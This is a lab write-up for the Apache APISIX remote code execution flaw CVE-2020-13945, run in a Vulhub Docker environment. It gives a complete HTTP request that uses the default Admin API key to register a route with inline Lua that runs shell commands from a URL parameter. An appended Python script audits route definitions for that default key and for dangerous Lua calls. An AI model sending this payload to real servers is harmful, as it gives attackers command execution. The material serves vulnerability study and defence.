Apache APISIX RCE (CVE-2020-13945)

Introduction

Vulhub is a collection of vulnerable environments built on docker and docker-compose. Enter the corresponding directory and run a single command to bring up a fresh vulnerable environment, which makes reproduction simpler and lets security researchers focus on the underlying cause of the vulnerability itself.

GitHub address: https://github.com/vulhub/vulhub

# Download the project
git clone https://github.com/vulhub/vulhub.git
# Enter the target environment directory
cd vulhub/xxx
# Start the target environment
docker-compose up

Vulnerable environment

Target: 192.168.199.132

cd vulhub/apisix/CVE-2020-13945
docker-compose up

Access address: http://192.168.199.132:9080, where the default 404 page is shown.

Vulnerability reproduction

Use the default Admin API token to add a malicious route whose `script` field contains malicious Lua code.

POST /apisix/admin/routes HTTP/1.1
Host: 192.168.199.132:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 357

{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}

Visit http://192.168.199.132:9080/attack?cmd=id
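The two conditions the reproduction above depends on are a still-default Admin API key and a route that carries inline Lua reaching into the operating system. The following added example (not part of the original post or of the APISIX project) audits for both offline: it compares a configured key against the default one used in the request above, and it scans route objects for a `script` field whose Lua calls `io.popen` or similar. The route list structure (`node.nodes[].value`) is assumed to match the etcd-style Admin API response of APISIX, and the sample routes are constructed for this example.

```python
"""Offline audit of Apache APISIX route definitions for CVE-2020-13945 exposure.

Added example, not code from the original post or from the APISIX project.
Assumptions: the Admin API response layout is etcd-style (node.nodes[].value,
or node.value for a single route) and the sample routes are constructed here.
"""
import json
import re

# Default Admin API key shipped with APISIX (the one used in the request above).
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"

# Lua calls that hand control to the operating system or filesystem; any of
# them inside a route's `script` field is a red flag for command execution.
DANGEROUS_LUA_CALLS = re.compile(r"\b(io\.popen|os\.execute|os\.remove|io\.open)\s*\(")


def is_default_admin_key(key: str) -> bool:
    """True when the configured Admin API key is still the publicly known default."""
    return key.strip() == DEFAULT_ADMIN_KEY


def extract_routes(admin_response: str) -> list:
    """Pull route objects out of an Admin API GET /apisix/admin/routes reply.

    Assumed layout: {"node": {"nodes": [{"key": ..., "value": {...}}, ...]}}
    or, for a single route, {"node": {"value": {...}}}.
    """
    data = json.loads(admin_response)
    node = data.get("node", {})
    if "nodes" in node:
        return [n["value"] for n in node["nodes"] if "value" in n]
    if "value" in node:
        return [node["value"]]
    return []


def audit_route(route: dict) -> list:
    """Return human-readable findings for one route object (empty list if clean)."""
    findings = []
    uri = route.get("uri", "<no uri>")
    script = route.get("script")
    if script is not None:
        findings.append(f"route {uri}: carries an inline Lua 'script' field")
        calls = sorted({m.group(1) for m in DANGEROUS_LUA_CALLS.finditer(script)})
        if calls:
            findings.append(
                f"route {uri}: script calls {', '.join(calls)} (OS command execution)"
            )
    return findings


def audit_routes(routes: list) -> list:
    """Audit every route and collect the findings."""
    findings = []
    for route in routes:
        findings.extend(audit_route(route))
    return findings


# Constructed sample Admin API response: one benign route and one shaped like
# the proof-of-concept route registered in the write-up above.
SAMPLE_ADMIN_RESPONSE = json.dumps({
    "node": {
        "key": "/apisix/routes",
        "nodes": [
            {"key": "/apisix/routes/1", "value": {
                "uri": "/hello",
                "upstream": {"type": "roundrobin", "nodes": {"example.com:80": 1}},
            }},
            {"key": "/apisix/routes/2", "value": {
                "uri": "/attack",
                "script": "local _M = {}\nfunction _M.access(conf, ctx)\n"
                          " local f = assert(io.popen(ngx.req.get_uri_args().cmd, 'r'))\n"
                          " ngx.say(f:read('*a'))\n f:close()\nend\nreturn _M",
                "upstream": {"type": "roundrobin", "nodes": {"example.com:80": 1}},
            }},
        ],
    },
})


if __name__ == "__main__":
    # Constructed value standing in for the key read from config.yaml.
    configured_key = "edd1c9f034335f136f87ad84b625c8f1"
    if is_default_admin_key(configured_key):
        print("FINDING: Admin API key is the default; rotate it and restrict Admin API access")
    for finding in audit_routes(extract_routes(SAMPLE_ADMIN_RESPONSE)):
        print("FINDING:", finding)
```

Run against a saved copy of the Admin API route listing, the script reports every route that embeds Lua and names the OS-level calls it makes, which is the quickest way to tell whether a route like `/attack` was ever registered; the key check is what closes the door in the first place.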